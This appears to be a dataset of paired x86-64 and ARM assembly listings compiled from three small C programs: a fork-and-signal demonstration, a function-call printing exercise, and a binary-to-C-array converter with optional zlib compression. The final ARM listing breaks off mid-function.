x86
stringlengths
321
9M
arm
stringlengths
335
9.68M
.file "219636.c" .intel_syntax noprefix .text .globl pid1 .bss .align 4 .type pid1, @object .size pid1, 4 pid1: .zero 4 .globl pid2 .align 4 .type pid2, @object .size pid2, 4 pid2: .zero 4 .section .rodata .LC0: .string "child[1:%d] runs: %d\n" .LC1: .string "child[2:%d] runs: %d\n" .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -8[rbp], 0 mov DWORD PTR -4[rbp], 0 lea rsi, stopHandler[rip] mov edi, 19 call signal@PLT lea rsi, contHandler[rip] mov edi, 18 call signal@PLT call fork@PLT mov DWORD PTR pid1[rip], eax mov eax, DWORD PTR pid1[rip] test eax, eax jne .L2 .L3: mov edi, 1 call sleep@PLT add DWORD PTR -8[rbp], 1 call getpid@PLT mov ecx, eax mov eax, DWORD PTR -8[rbp] mov edx, eax mov esi, ecx lea rdi, .LC0[rip] mov eax, 0 call printf@PLT jmp .L3 .L2: call fork@PLT mov DWORD PTR pid2[rip], eax mov eax, DWORD PTR pid2[rip] test eax, eax jne .L4 .L5: mov edi, 1 call sleep@PLT add DWORD PTR -4[rbp], 1 call getpid@PLT mov ecx, eax mov eax, DWORD PTR -4[rbp] mov edx, eax mov esi, ecx lea rdi, .LC1[rip] mov eax, 0 call printf@PLT jmp .L5 .L4: mov edi, 2 call sleep@PLT mov eax, DWORD PTR pid1[rip] mov esi, 19 mov edi, eax call kill@PLT mov edi, 2 call sleep@PLT mov eax, DWORD PTR pid1[rip] mov esi, 18 mov edi, eax call kill@PLT mov edi, 2 call sleep@PLT mov eax, DWORD PTR pid2[rip] mov esi, 19 mov edi, eax call kill@PLT mov edi, 2 call sleep@PLT mov eax, DWORD PTR pid2[rip] mov esi, 18 mov edi, eax call kill@PLT mov edi, 5 call sleep@PLT mov eax, DWORD PTR pid1[rip] mov esi, 9 mov edi, eax call kill@PLT mov eax, DWORD PTR pid2[rip] mov esi, 9 mov edi, eax call kill@PLT mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .section .rodata .align 8 .LC2: .string "[STOP] child process %d stops\n" .text .globl stopHandler .type stopHandler, @function stopHandler: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 call getpid@PLT mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size stopHandler, .-stopHandler .section .rodata .align 8 .LC3: .string "[CONT] child process %d continues\n" .text .globl contHandler .type contHandler, @function contHandler: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 call getpid@PLT mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size contHandler, .-contHandler .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "219636.c" .text .comm pid1,4,4 .comm pid2,4,4 .section .rodata .align 2 .LC0: .ascii "child[1:%d] runs: %d\012\000" .align 2 .LC1: .ascii "child[2:%d] runs: %d\012\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 mov r3, #0 str r3, [fp, #-12] mov r3, #0 str r3, [fp, #-8] ldr r1, .L7 mov r0, #19 bl signal ldr r1, .L7+4 mov r0, #18 bl signal bl fork mov r3, r0 mov r2, r3 ldr r3, .L7+8 str r2, [r3] ldr r3, .L7+8 ldr r3, [r3] cmp r3, #0 bne .L2 .L3: mov r0, #1 bl sleep bl getpid mov r1, r0 ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] ldr r2, [fp, #-12] ldr r0, .L7+12 bl printf b .L3 .L2: bl fork mov r3, r0 mov r2, r3 ldr r3, .L7+16 str r2, [r3] ldr r3, .L7+16 ldr r3, [r3] cmp r3, #0 bne .L4 .L5: mov r0, #1 bl sleep bl getpid mov r1, r0 ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] ldr r2, [fp, #-8] ldr r0, .L7+20 bl printf b .L5 .L4: mov r0, #2 bl sleep ldr r3, .L7+8 ldr r3, [r3] mov r1, #19 mov r0, r3 bl kill mov r0, #2 bl sleep ldr r3, .L7+8 ldr r3, [r3] mov r1, #18 mov r0, r3 bl kill mov r0, #2 bl sleep ldr r3, .L7+16 ldr r3, [r3] mov r1, #19 mov r0, r3 bl kill mov r0, #2 bl sleep ldr r3, .L7+16 ldr r3, [r3] mov r1, #18 mov r0, r3 bl kill mov r0, #5 bl sleep ldr r3, .L7+8 ldr r3, [r3] mov r1, #9 mov r0, r3 bl kill ldr r3, .L7+16 ldr r3, [r3] mov r1, #9 mov r0, r3 bl kill mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L8: .align 2 .L7: .word stopHandler .word contHandler .word pid1 .word .LC0 .word pid2 .word .LC1 .size main, .-main .section .rodata .align 2 .LC2: .ascii "[STOP] child process %d stops\012\000" .text .align 2 .global stopHandler .syntax unified .arm .fpu softvfp .type stopHandler, %function stopHandler: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 bl getpid mov r3, r0 mov r1, r3 ldr r0, .L10 bl printf nop pop {fp, pc} .L11: .align 2 .L10: .word .LC2 .size stopHandler, .-stopHandler .section .rodata .align 2 .LC3: .ascii "[CONT] child process %d continues\012\000" .text .align 2 .global contHandler .syntax unified .arm .fpu softvfp .type contHandler, %function contHandler: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 bl getpid mov r3, r0 mov r1, r3 ldr r0, .L13 bl printf nop pop {fp, pc} .L14: .align 2 .L13: .word .LC3 .size contHandler, .-contHandler .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "1004886.c" .intel_syntax noprefix .text .section .rodata .align 8 .LC0: .string "[A] - in `main`, n=%d, p=%d, q=%d\n" .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov DWORD PTR -20[rbp], edi mov QWORD PTR -32[rbp], rsi mov DWORD PTR -12[rbp], 2 mov DWORD PTR -8[rbp], 5 mov edx, DWORD PTR -12[rbp] mov eax, DWORD PTR -8[rbp] mov esi, edx mov edi, eax call f mov edx, DWORD PTR -12[rbp] mov eax, DWORD PTR -8[rbp] mov esi, edx mov edi, eax call fct mov DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] imul eax, DWORD PTR -12[rbp] mov DWORD PTR -4[rbp], eax mov edx, DWORD PTR -12[rbp] mov eax, DWORD PTR -4[rbp] mov esi, edx mov edi, eax call f mov ecx, DWORD PTR -4[rbp] mov edx, DWORD PTR -8[rbp] mov eax, DWORD PTR -12[rbp] mov esi, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .section .rodata .align 8 .LC1: .string "[B] - in `fct`, n=%d, p=%d, q=%d\n" .text .globl fct .type fct, @function fct: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov DWORD PTR -20[rbp], edi mov DWORD PTR -24[rbp], esi mov eax, DWORD PTR -20[rbp] lea edx, [rax+rax] mov eax, DWORD PTR -24[rbp] add eax, edx mov DWORD PTR -4[rbp], eax mov ecx, DWORD PTR -4[rbp] mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -24[rbp] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT add DWORD PTR -20[rbp], 2 mov eax, DWORD PTR -4[rbp] lea edx, [rax+rax] mov eax, DWORD PTR -20[rbp] add eax, edx leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size fct, .-fct .section .rodata .align 8 .LC2: .string "[C] - in `f`, n=%d, p=%d, q=%d\n" .text .globl f .type f, @function f: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov DWORD PTR -20[rbp], edi mov DWORD PTR -24[rbp], esi mov edx, DWORD PTR -24[rbp] mov eax, edx add eax, eax add edx, eax mov eax, DWORD PTR -20[rbp] add eax, edx mov DWORD PTR -4[rbp], eax mov ecx, DWORD PTR -4[rbp] mov edx, DWORD PTR -24[rbp] mov eax, DWORD PTR -20[rbp] mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size f, .-f .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "1004886.c" .text .section .rodata .align 2 .LC0: .ascii "[A] - in `main`, n=%d, p=%d, q=%d\012\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-24] str r1, [fp, #-28] mov r3, #2 str r3, [fp, #-16] mov r3, #5 str r3, [fp, #-12] ldr r1, [fp, #-16] ldr r0, [fp, #-12] bl f ldr r1, [fp, #-16] ldr r0, [fp, #-12] bl fct str r0, [fp, #-16] ldr r3, [fp, #-12] ldr r2, [fp, #-16] mul r3, r2, r3 str r3, [fp, #-8] ldr r1, [fp, #-16] ldr r0, [fp, #-8] bl f ldr r3, [fp, #-8] ldr r2, [fp, #-12] ldr r1, [fp, #-16] ldr r0, .L3 bl printf mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L4: .align 2 .L3: .word .LC0 .size main, .-main .section .rodata .align 2 .LC1: .ascii "[B] - in `fct`, n=%d, p=%d, q=%d\012\000" .text .align 2 .global fct .syntax unified .arm .fpu softvfp .type fct, %function fct: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] ldr r3, [fp, #-16] lsl r3, r3, #1 ldr r2, [fp, #-20] add r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-8] ldr r2, [fp, #-16] ldr r1, [fp, #-20] ldr r0, .L7 bl printf ldr r3, [fp, #-16] add r3, r3, #2 str r3, [fp, #-16] ldr r3, [fp, #-8] lsl r2, r3, #1 ldr r3, [fp, #-16] add r3, r2, r3 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L8: .align 2 .L7: .word .LC1 .size fct, .-fct .section .rodata .align 2 .LC2: .ascii "[C] - in `f`, n=%d, p=%d, q=%d\012\000" .text .align 2 .global f .syntax unified .arm .fpu softvfp .type f, %function f: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] ldr r2, [fp, #-20] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-8] ldr r2, [fp, #-20] ldr r1, [fp, #-16] ldr r0, .L10 bl printf nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L11: .align 2 .L10: .word .LC2 .size f, .-f .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "125307.c" .intel_syntax noprefix .text .local buf .comm buf,16384,32 .local zbuf .comm zbuf,16384,32 .section .rodata .align 8 .LC0: .string "Usage: bintoc [--compress] <in> <out> <symbol>\n" .text .globl print_usage .type print_usage, @function print_usage: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 47 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size print_usage, .-print_usage .section .rodata .LC1: .string "--compress" .LC2: .string "rb" .align 8 .LC3: .string "Unable to open %s for reading\n" .LC4: .string "wb" .align 8 .LC5: .string "Unable to open %s for writing\n" .align 8 .LC6: .string "#include <cstdint>\n#include <cstddef>\n" .align 8 .LC7: .string "extern \"C\" const uint8_t %s[] =\n{\n " .LC8: .string "1.2.11" .align 8 .LC9: .string "zlib initialization failed %d\n" .LC10: .string "zlib compression failed %d\n" .LC11: .string "0x%02X, " .LC12: .string "\n " .align 8 .LC13: .string "0x00};\nextern \"C\" const size_t %s_SZ = %zu;\n" .align 8 .LC14: .string "extern \"C\" const size_t %s_DECOMPRESSED_SZ = %zu;\n" .align 8 .LC15: .string "0x0};\nextern \"C\" const size_t %s_SZ = %zu;\n" .text .globl main .type main, @function main: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 240 mov DWORD PTR -228[rbp], edi mov QWORD PTR -240[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax cmp DWORD PTR -228[rbp], 3 jg .L3 mov eax, 0 call print_usage mov eax, 1 jmp .L4 .L3: mov rax, QWORD PTR -240[rbp] mov rax, QWORD PTR 8[rax] mov QWORD PTR -200[rbp], rax mov rax, QWORD PTR -240[rbp] mov rax, QWORD PTR 16[rax] mov QWORD PTR -192[rbp], rax mov rax, QWORD PTR -240[rbp] mov rax, QWORD PTR 24[rax] mov QWORD PTR -184[rbp], rax mov BYTE PTR -217[rbp], 0 mov rax, QWORD PTR -200[rbp] lea rsi, .LC1[rip] mov rdi, rax call strcmp@PLT test eax, eax jne .L5 cmp DWORD PTR -228[rbp], 4 jg .L6 mov eax, 0 call print_usage mov eax, 1 jmp .L4 .L6: mov rax, QWORD PTR -240[rbp] mov rax, QWORD PTR 16[rax] mov QWORD PTR -200[rbp], rax mov rax, QWORD PTR -240[rbp] mov rax, QWORD PTR 24[rax] mov QWORD PTR -192[rbp], rax mov rax, QWORD PTR -240[rbp] mov rax, QWORD PTR 32[rax] mov QWORD PTR -184[rbp], rax mov BYTE PTR -217[rbp], 1 .L5: mov rax, QWORD PTR -200[rbp] lea rsi, .LC2[rip] mov rdi, rax call fopen@PLT mov QWORD PTR -160[rbp], rax cmp QWORD PTR -160[rbp], 0 jne .L7 mov rax, QWORD PTR stderr[rip] mov rdx, QWORD PTR -200[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov eax, 1 jmp .L4 .L7: mov rax, QWORD PTR -192[rbp] lea rsi, .LC4[rip] mov rdi, rax call fopen@PLT mov QWORD PTR -152[rbp], rax cmp QWORD PTR -152[rbp], 0 jne .L8 mov rax, QWORD PTR stderr[rip] mov rdx, QWORD PTR -192[rbp] lea rsi, .LC5[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov eax, 1 jmp .L4 .L8: mov rax, QWORD PTR -152[rbp] mov rcx, rax mov edx, 38 mov esi, 1 lea rdi, .LC6[rip] call fwrite@PLT mov rdx, QWORD PTR -184[rbp] mov rax, QWORD PTR -152[rbp] lea rsi, .LC7[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov QWORD PTR -176[rbp], 0 cmp BYTE PTR -217[rbp], 0 je .L23 mov QWORD PTR -168[rbp], 0 lea rdx, -128[rbp] mov eax, 0 mov ecx, 14 mov rdi, rdx rep stosq lea rax, -128[rbp] push 112 lea rdx, .LC8[rip] push rdx mov r9d, 0 mov r8d, 9 mov ecx, 31 mov edx, 8 mov esi, 9 mov rdi, rax call deflateInit2_@PLT add rsp, 16 mov DWORD PTR -208[rbp], eax cmp DWORD PTR -208[rbp], 0 je .L12 mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -208[rbp] lea rsi, .LC9[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov eax, 1 jmp .L4 .L21: mov eax, DWORD PTR -120[rbp] mov eax, eax add QWORD PTR -176[rbp], rax lea rax, buf[rip] mov QWORD PTR -128[rbp], rax mov rax, QWORD PTR -160[rbp] mov rdi, rax call feof@PLT mov DWORD PTR -204[rbp], eax .L20: lea rax, zbuf[rip] mov QWORD PTR -104[rbp], rax mov DWORD PTR -96[rbp], 16384 cmp DWORD PTR -204[rbp], 0 je .L13 mov edx, 4 jmp .L14 .L13: mov edx, 0 .L14: lea rax, -128[rbp] mov esi, edx mov rdi, rax call deflate@PLT mov DWORD PTR -208[rbp], eax cmp DWORD PTR -208[rbp], -2 jne .L15 mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -208[rbp] lea rsi, .LC10[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov eax, 1 jmp .L4 .L15: mov eax, DWORD PTR -96[rbp] mov edx, eax mov eax, 16384 sub rax, rdx mov QWORD PTR -136[rbp], rax cmp QWORD PTR -136[rbp], 0 je .L16 mov DWORD PTR -216[rbp], 0 jmp .L17 .L19: mov eax, DWORD PTR -216[rbp] cdqe lea rdx, zbuf[rip] movzx eax, BYTE PTR [rax+rdx] movzx edx, al mov rax, QWORD PTR -152[rbp] lea rsi, .LC11[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov eax, DWORD PTR -216[rbp] movsx rdx, eax mov rax, QWORD PTR -168[rbp] add rax, rdx add rax, 1 and eax, 31 test rax, rax jne .L18 mov rax, QWORD PTR -152[rbp] mov rcx, rax mov edx, 5 mov esi, 1 lea rdi, .LC12[rip] call fwrite@PLT .L18: add DWORD PTR -216[rbp], 1 .L17: mov eax, DWORD PTR -216[rbp] cdqe cmp QWORD PTR -136[rbp], rax ja .L19 mov rax, QWORD PTR -136[rbp] add QWORD PTR -168[rbp], rax .L16: mov eax, DWORD PTR -96[rbp] test eax, eax je .L20 cmp DWORD PTR -204[rbp], 0 je .L12 cmp DWORD PTR -208[rbp], 0 je .L20 cmp DWORD PTR -208[rbp], -5 je .L20 .L12: mov rax, QWORD PTR -160[rbp] mov rcx, rax mov edx, 16384 mov esi, 1 lea rdi, buf[rip] call fread@PLT mov DWORD PTR -120[rbp], eax mov eax, DWORD PTR -120[rbp] test eax, eax jne .L21 lea rax, -128[rbp] mov rdi, rax call deflateEnd@PLT mov rcx, QWORD PTR -168[rbp] mov rdx, QWORD PTR -184[rbp] mov rax, QWORD PTR -152[rbp] lea rsi, .LC13[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rcx, QWORD PTR -176[rbp] mov rdx, QWORD PTR -184[rbp] mov rax, QWORD PTR -152[rbp] lea rsi, .LC14[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L22 .L27: mov DWORD PTR -212[rbp], 0 jmp .L24 .L26: mov eax, DWORD PTR -212[rbp] cdqe lea rdx, buf[rip] movzx eax, BYTE PTR [rax+rdx] movzx edx, al mov rax, QWORD PTR -152[rbp] lea rsi, .LC11[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov eax, DWORD PTR -212[rbp] movsx rdx, eax mov rax, QWORD PTR -176[rbp] add rax, rdx add rax, 1 and eax, 31 test rax, rax jne .L25 mov rax, QWORD PTR -152[rbp] mov rcx, rax mov edx, 5 mov esi, 1 lea rdi, .LC12[rip] call fwrite@PLT .L25: add DWORD PTR -212[rbp], 1 .L24: mov eax, DWORD PTR -212[rbp] cdqe cmp QWORD PTR -144[rbp], rax ja .L26 mov rax, QWORD PTR -144[rbp] add QWORD PTR -176[rbp], rax .L23: mov rax, QWORD PTR -160[rbp] mov rcx, rax mov edx, 16384 mov esi, 1 lea rdi, buf[rip] call fread@PLT mov QWORD PTR -144[rbp], rax cmp QWORD PTR -144[rbp], 0 jne .L27 mov rcx, QWORD PTR -176[rbp] mov rdx, QWORD PTR -184[rbp] mov rax, QWORD PTR -152[rbp] lea rsi, .LC15[rip] mov rdi, rax mov eax, 0 call fprintf@PLT .L22: mov rax, QWORD PTR -160[rbp] mov rdi, rax call fclose@PLT mov rax, QWORD PTR -152[rbp] mov rdi, rax call fclose@PLT mov eax, 0 .L4: mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L28 call __stack_chk_fail@PLT .L28: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "125307.c" .text .local buf .comm buf,16384,4 .local zbuf .comm zbuf,16384,4 .section .rodata .align 2 .LC0: .ascii "Usage: bintoc [--compress] <in> <out> <symbol>\012\000" .text .align 2 .global print_usage .syntax unified .arm .fpu softvfp .type print_usage, %function print_usage: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 ldr r3, .L2 ldr r3, [r3] mov r2, #47 mov r1, #1 ldr r0, .L2+4 bl fwrite nop pop {fp, pc} .L3: .align 2 .L2: .word stderr .word .LC0 .size print_usage, .-print_usage .section .rodata .align 2 .LC1: .ascii "--compress\000" .align 2 .LC2: .ascii "rb\000" .align 2 .LC3: .ascii "Unable to open %s for reading\012\000" .align 2 .LC4: .ascii "wb\000" .align 2 .LC5: .ascii "Unable to open %s for writing\012\000" .align 2 .LC6: .ascii "#include <cstdint>\012#include <cstddef>\012\000" .align 2 .LC7: .ascii "extern \"C\" const uint8_t %s[] =\012{\012 \000" .align 2 .LC8: .ascii "1.2.11\000" .align 2 .LC9: .ascii "zlib initialization failed %d\012\000" .align 2 .LC10: .ascii "zlib compression failed %d\012\000" .align 2 .LC11: .ascii "0x%02X, \000" .align 2 .LC12: .ascii "\012 \000" .align 2 .LC13: .ascii "0x00};\012extern \"C\" const size_t %s_SZ = %zu;\012" .ascii "\000" .align 2 .LC14: .ascii "extern \"C\" const size_t %s_DECOMPRESSED_SZ = %zu;" .ascii "\012\000" .align 2 .LC15: .ascii "0x0};\012extern \"C\" const size_t %s_SZ = %zu;\012" .ascii "\000" .align 2 .LC16: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 128 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #144 str r0, [fp, #-128] str r1, [fp, #-132] ldr r3, .L31 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, [fp, #-128] cmp r3, #3 bgt .L5 bl print_usage mov r3, #1 b .L6 .L5: ldr r3, [fp, #-132] ldr r3, [r3, #4] str r3, [fp, #-116] ldr r3, [fp, #-132] ldr r3, [r3, #8] str r3, [fp, #-112] ldr r3, [fp, #-132] ldr r3, [r3, #12] str r3, [fp, #-108] mov r3, #0 strb r3, [fp, #-117] ldr r1, .L31+4 ldr r0, [fp, #-116] bl strcmp mov r3, r0 cmp r3, #0 bne .L7 ldr r3, [fp, #-128] cmp r3, #4 bgt .L8 bl print_usage mov r3, #1 b .L6 .L8: ldr r3, [fp, #-132] ldr r3, [r3, #8] str r3, [fp, #-116] ldr r3, [fp, #-132] ldr r3, [r3, #12] str r3, [fp, #-112] ldr r3, [fp, #-132] ldr r3, [r3, #16] str r3, [fp, #-108] mov r3, #1 strb r3, [fp, #-117] .L7: ldr r1, .L31+8 ldr r0, [fp, #-116] bl fopen str r0, [fp, #-88] ldr r3, [fp, #-88] cmp r3, #0 bne .L9 ldr r3, .L31+12 ldr r3, [r3] ldr r2, [fp, #-116] ldr r1, .L31+16 mov r0, r3 bl fprintf mov r3, #1 b .L6 .L9: ldr r1, .L31+20 ldr r0, [fp, #-112] bl fopen str r0, [fp, #-84] ldr r3, [fp, #-84] cmp r3, #0 bne .L10 ldr r3, .L31+12 ldr r3, [r3] ldr r2, [fp, #-112] ldr r1, .L31+24 mov r0, r3 bl fprintf mov r3, #1 b .L6 .L10: ldr r3, [fp, #-84] mov r2, #38 mov r1, #1 ldr r0, .L31+28 bl fwrite ldr r2, [fp, #-108] ldr r1, .L31+32 ldr r0, [fp, #-84] bl fprintf mov r3, #0 str r3, [fp, #-104] ldrb r3, [fp, #-117] @ zero_extendqisi2 cmp r3, #0 beq .L25 mov r3, #0 str r3, [fp, #-100] sub r3, fp, #64 mov r2, #56 mov r1, #0 mov r0, r3 bl memset sub r0, fp, #64 mov r3, #56 str r3, [sp, #12] ldr r3, .L31+36 str r3, [sp, #8] mov r3, #0 str r3, [sp, #4] mov r3, #9 str r3, [sp] mov r3, #31 mov r2, #8 mov r1, #9 bl deflateInit2_ str r0, [fp, #-76] ldr r3, [fp, #-76] cmp r3, #0 beq .L14 ldr r3, .L31+12 ldr r3, [r3] ldr r2, [fp, #-76] ldr r1, .L31+40 mov r0, r3 bl fprintf mov r3, #1 b .L6 .L23: ldr r3, [fp, #-60] ldr r2, [fp, #-104] add r3, r2, r3 str r3, [fp, #-104] ldr r3, .L31+44 str r3, [fp, #-64] ldr r0, [fp, #-88] bl feof str r0, [fp, #-72] .L22: ldr r3, .L31+48 str r3, [fp, #-52] mov r3, #16384 str r3, [fp, #-48] ldr r3, [fp, #-72] cmp r3, #0 beq .L15 mov r2, #4 b .L16 .L15: mov r2, #0 .L16: sub r3, fp, #64 mov r1, r2 mov r0, r3 bl deflate str r0, [fp, #-76] ldr r3, [fp, #-76] cmn r3, #2 bne .L17 ldr r3, .L31+12 ldr r3, [r3] ldr r2, [fp, #-76] ldr r1, .L31+52 mov r0, r3 bl fprintf mov r3, #1 b .L6 .L17: ldr r3, [fp, #-48] rsb r3, r3, #16384 str r3, [fp, #-68] ldr r3, [fp, #-68] cmp r3, #0 beq .L18 mov r3, #0 str r3, [fp, #-96] b .L19 .L21: ldr r2, .L31+48 ldr r3, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r1, .L31+56 ldr r0, [fp, #-84] bl fprintf ldr r2, [fp, #-96] ldr r3, [fp, #-100] add r3, r2, r3 add r3, r3, #1 and r3, r3, #31 cmp r3, #0 bne .L20 ldr r3, [fp, #-84] mov r2, #5 mov r1, #1 ldr r0, .L31+60 bl fwrite .L20: ldr r3, [fp, #-96] add r3, r3, #1 str r3, [fp, #-96] .L19: ldr r3, [fp, #-96] ldr r2, [fp, #-68] cmp r2, r3 bhi .L21 ldr r2, [fp, #-100] ldr r3, [fp, #-68] add r3, r2, r3 str r3, [fp, #-100] .L18: ldr r3, [fp, #-48] cmp r3, #0 beq .L22 ldr r3, [fp, #-72] cmp r3, #0 beq .L14 ldr r3, [fp, #-76] cmp r3, #0 beq .L22 ldr r3, [fp, #-76] cmn r3, #5 beq .L22 .L14: ldr r3, [fp, #-88] mov r2, #16384 mov r1, #1 ldr r0, .L31+44 bl fread mov r3, r0 str r3, [fp, #-60] ldr r3, [fp, #-60] cmp r3, #0 bne .L23 sub r3, fp, #64 mov r0, r3 bl deflateEnd ldr r3, [fp, #-100] ldr r2, [fp, #-108] ldr r1, .L31+64 ldr r0, [fp, #-84] bl fprintf ldr r3, [fp, #-104] ldr r2, [fp, #-108] ldr r1, .L31+68 ldr r0, [fp, #-84] bl fprintf b .L24 .L29: mov r3, #0 str r3, [fp, #-92] b .L26 .L28: ldr r2, .L31+44 ldr r3, [fp, #-92] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r1, .L31+56 ldr r0, [fp, #-84] bl fprintf ldr r2, [fp, #-92] ldr r3, [fp, #-104] add r3, r2, r3 add r3, r3, #1 and r3, r3, #31 cmp r3, #0 bne .L27 